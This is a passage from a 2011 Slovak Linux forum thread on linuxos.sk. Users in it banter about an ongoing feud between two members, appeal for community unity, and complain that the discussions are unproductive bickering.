            ale zatial ma to takto viac bavi, je to sranda citanie

            dakujem

            P
            • Re: odpoveď 22.08.2011 | 16:01
              Avatar Stanislav Hoferek Greenie 18.04  Používateľ
              niekto určite tuší, kde je pôvod konfliktu, no ja to fakt neviem :D

              myslím však, že by bolo bolo lepšie sranda čítanie, keby to bola nejaká poviedka (alebo asi skôr román) pre tých, čo o to majú záujem :) urobme subdoménu dodoedohoferek.linuxos.sk a tam sa môžeme slovne mlátiť. Nie tu. Môžeme si urobiť aj 10 správičiek v zmysle "A nemá rád B" a ďalších desať typu "B nemá rád A". Ešte z nás dvoch bude komediálna dvojica :) Tu medzi vážnymi témami je však táto komédia niekedy fakt tragédia...
              • Re: odpoveď 22.08.2011 | 16:12
                Avatar gs_peter Mac OS X, iOS  Používateľ
                ale kdeze, nie je to ziadna tragedia, proste si nesedite a nikdy ani nebudete, ste az prilis podobni, aby ste sa vedeli dohodnut, obaja mate chorobu posledneho slova a nedokazete nereagovat jeden na druheho, dalo by sa povedat, ze keby ste boli muz a zena, tak sa nedokazete rozist, aj keby ste mali spolu peklo, proste aj taketo situacie sa v zivote stavaju a netreba ich vnimat akokolvek tragicky, proste su take ake su a treba si z nich vziat to, co pomoze obom, to okolo je len taka omacka, ktora vas tlaci byt lepsimi, ci tomu verite alebo nie, kazdy musi mat niekoho, s kym sa proste valcuje, co to da, my ostatni sa mozeme jedine zabavat, ale aj my mame svojich "odporcov", ktori nam sprijemnuju kazdy den
                • Re: odpoveď 22.08.2011 | 16:16
                  Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                  nuž, ak je to zábava, tak som rád. S tou chorobou súhlasím... už sme asi takí. Jeden má pravdu, druhý ju má ešte o percento viac a tak dookola. Neviem, či na to pomáhajú antibiotiká, no určite pomáha dva litre domácej citronády. Super na schladenie tela i myšlienok :) Dodoedo, dáš si aj ty? Pozývam na pohárik :)
        • Re: odpoveď 22.08.2011 | 15:12
          Avatar Róbert Dúbravský PC Debian alebo Ubuntu - servery Debian  Používateľ
          Dobra odpoveď. Tvoje spravy si prečítam aj ja, podla mna su v pohode. Az na tu s tym odkazom na ten blog na roote :). Tie ustipacne poznamky som hlavne myslel v diskusii. Inac OK, ide sa dalej...
          • Re: odpoveď 22.08.2011 | 16:07
            Avatar dodoedo Fedora Linux  Používateľ
            OK,

            ide sa dalej.

            :-)
            G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
            • Re: odpoveď 22.08.2011 | 20:03
              mustafa   Návštevník
              dodoedo: Tento portál má stále silu a sám som pred nedávnom písal, že je aj najsledovanejším slovenským (a sčasti aj moravským ) portálom a nikto to nezmení.

              Ako si prisiel na to, ze linuxos.sk je scasti aj moravskym portalom?
      • Re: Máme radi LinuxOS 22.08.2011 | 21:55
        Avatar Ján Šuvada Linux MINT 20 MATE, EdUbuntu 23.10, Windows 11  Používateľ
        Milí priatelia, vážme si jeden druhého a hľadajme to, čo nás spája. Nebuďme ako v príbehu o labuti, šťuke a rakovi, ktorí ťahali každý iným smerom a nemohli sa pohnúť dopredu. Linux si zaslúži jednotu v slobode, ktorú ponúka každému používateľovi.
        Prosím neriešte konflikty hnevom, ale hľadajte riešenie na posunutie vpred. Verím, že linuxová komunita sa zomkne a bude si pomáhať ako doteraz, ba ešte viac. Krásne dni plné linuxu prajem všetkým.
        "Keď ľudožrút používa vidličku a nôž, znamená to pokrok?"
        • o linuxe 23.10.2011 | 14:45
          trdlo   Návštevník
          clovek ktori len tak nahodou brusio po strankach a hlada infosky vlezie na portaly slovenskych a ceskych linux komunit v nadeji ze v diskusiach najde nejake zaujimave napady postrehy riesenia ale namiesto toho som tu nasiel nieco co mi strasne pripomina niekdajsie hratky a sutaze kto je vatsi frajer a kto dalej docika na serveroch ircnetu postu a inych chatoch skoda zas sa nic nenaucim pretoze po osmom prispevku tuto stranku clovek znechutene opusta a vyberqa sa inym smerom nakolko posledne co ho zaujima je hladat jednu relevantnu info medzi 10000 prispevkami o tom ze kto je vatsi blbec ( s prepacenim za vyraz )

          potreboval som sa vyjadrit mozno sa tym daco casom zmeni a mozno ze ked sem zas niekedy pochabo vleziem v domnienke ze najdem nieco co ma s mojim problemom posunie dalej nebudem tu citat same infantilne hovadiny a najdem naozaj postrehy a navrhy ako ten ktory problem riesit alebo nie


          s pozdravom.

          Prisiel som, Videl som, grcal som!
          • Re: o linuxe 23.10.2011 | 15:17
            Avatar Milan Dvorský debian,mint kde,android  Administrátor
            posledne tyzdne tu je relativny klud, cize ...